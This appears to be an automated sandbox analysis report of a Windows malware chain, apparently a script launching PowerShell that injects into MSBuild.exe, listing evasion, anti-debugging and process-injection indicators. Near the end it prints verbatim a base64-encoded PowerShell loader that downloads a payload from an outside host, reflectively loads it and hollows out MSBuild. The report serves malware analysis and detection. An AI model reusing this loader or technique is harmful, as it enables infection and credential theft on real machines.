                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040E54F Sleep,ExitProcess,7_2_0040E54F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_004198C2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5012Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4879Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5261Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4261Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-52568
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 9.4 %
                          Source: C:\Windows\System32\wscript.exe TID: 7296Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7848Thread sleep count: 210 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7848Thread sleep time: -105000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7852Thread sleep count: 5261 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7852Thread sleep time: -15783000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7852Thread sleep count: 4261 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7852Thread sleep time: -12783000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,7_2_0041B42F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040B53A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,7_2_004089A9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406AC2 FindFirstFileW,FindNextFileW,7_2_00406AC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,7_2_00407A8C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00418C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,7_2_00408DA7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00406F06
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00418981 memset,GetSystemInfo,8_2_00418981
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: MSBuild.exe, 00000007.00000002.4120281726.000000000104D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVTMC
                          Source: wscript.exe, 00000000.00000002.1714201627.0000013A577AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714264893.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712572682.0000013A577A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712785608.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712357297.0000013A577F0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4120281726.000000000104D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: wscript.exe, 00000000.00000002.1714514420.0000013A599C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: bhv59C6.tmp.8.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                          Source: bhv59C6.tmp.8.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_7-53652
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043A65D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCE3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00442554 mov eax, dword ptr fs:[00000030h]7_2_00442554
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]7_2_10004AB4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,7_2_00410B19
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00434168
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043A65D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00433B44
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00433CD7 SetUnhandledExceptionFilter,7_2_00433CD7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10002639
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_10002B1C

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                          Source: Yara matchFile source: amsi64_7360.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi64_7360.amsi.csv, type: OTHER
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,7_2_00417245
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AA6008Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_00410F36
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00418754 mouse_event,7_2_00418754
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumarJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\psbaiipwgpfutbdtwagt"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rmosjaaquxxzehzxflbutck"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"Jump to behavior
